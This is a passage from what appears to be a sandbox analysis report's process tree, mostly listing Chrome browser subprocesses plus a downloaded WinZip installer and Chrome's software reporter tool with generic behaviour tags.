C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7264 /prefetch:12⤵PID:208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:12⤵PID:4248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:12⤵PID:3616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7336 /prefetch:12⤵PID:5076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7444 /prefetch:12⤵PID:1720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9668 /prefetch:12⤵PID:2856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7428 /prefetch:12⤵PID:4712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7944 /prefetch:12⤵PID:4532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7448 /prefetch:12⤵PID:5988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6380 /prefetch:82⤵PID:4452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9400 /prefetch:12⤵PID:3656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7676 /prefetch:12⤵PID:1144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:12⤵PID:748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:12⤵PID:5124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6532 /prefetch:12⤵PID:5884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7100 /prefetch:12⤵PID:5912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:12⤵PID:4660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:12⤵PID:2468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:12⤵PID:4620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:12⤵PID:5840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7996 /prefetch:12⤵PID:3136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8280 /prefetch:12⤵PID:2988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:12⤵PID:4680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8676 /prefetch:12⤵PID:5260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7184 /prefetch:12⤵PID:6004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9048 /prefetch:12⤵PID:5756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:12⤵PID:1036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:12⤵PID:2284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9572 /prefetch:12⤵PID:4112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8912 /prefetch:12⤵PID:6076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9260 /prefetch:12⤵PID:5764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:12⤵PID:5368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:12⤵PID:4300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:12⤵PID:5648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:12⤵PID:5812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1664 /prefetch:12⤵PID:2708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7876 /prefetch:12⤵PID:3616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8092 /prefetch:82⤵PID:4312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9644 /prefetch:82⤵PID:64
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10096 /prefetch:82⤵PID:6108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10100 /prefetch:12⤵PID:4396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9052 /prefetch:82⤵PID:2064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5616 /prefetch:82⤵PID:3956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6116 /prefetch:82⤵PID:4168
-
-
C:\Users\Admin\Downloads\winzip27.exe"C:\Users\Admin\Downloads\winzip27.exe"2⤵
- Executes dropped EXE
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\e605be0\winzip27.exerun=1 shortcut="C:\Users\Admin\Downloads\winzip27.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Enumerates connected drives
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1824
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5384 /prefetch:22⤵PID:4748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5808 /prefetch:82⤵PID:860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1108 /prefetch:82⤵PID:1524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6204 /prefetch:82⤵PID:5680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7940 /prefetch:82⤵PID:3396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6780 /prefetch:82⤵PID:868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9040 /prefetch:82⤵PID:384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5596 /prefetch:82⤵PID:3864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:82⤵PID:4336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7908 /prefetch:82⤵PID:4368
-
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\107.294.200\software_reporter_tool.exe"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\107.294.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=e/SI9iUbcZYMe4+gpT5ShKD4R4+hEtBCmzxgF/cn --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=Off2⤵
- Executes dropped EXE
PID:5852 -
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=107.294.200 --initial-client-data=0x27c,0x280,0x284,0x278,0x258,0x7ff686415960,0x7ff686415970,0x7ff6864159803⤵
- Executes dropped EXE
PID:4516
-
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_5852_UNGYNDCKFJVWMKVD" --sandboxed-process-id=2 --init-done-notifier=748 --sandbox-mojo-pipe-token=9782502513786920353 --mojo-platform-channel-handle=724 --engine=23⤵
- Executes dropped EXE
PID:3776
-
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\107.294.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_5852_UNGYNDCKFJVWMKVD" --sandboxed-process-id=3 --init-done-notifier=984 --sandbox-mojo-pipe-token=6466188537731863880 --mojo-platform-channel-handle=9803⤵
- Executes dropped EXE
PID:884
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4176 /prefetch:82⤵PID:1180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5004 /prefetch:82⤵PID:4784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3892 /prefetch:82⤵PID:2880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6176 /prefetch:82⤵PID:488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:82⤵PID:4552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:12⤵PID:4716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:12⤵PID:3084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4940 /prefetch:82⤵PID:3864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:82⤵PID:4084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8092 /prefetch:82⤵PID:2284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:12⤵PID:3304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:12⤵PID:3748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:12⤵PID:1728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10116 /prefetch:12⤵PID:3008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:12⤵PID:1112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:12⤵PID:3144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:12⤵PID:516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:12⤵PID:4300
-
-
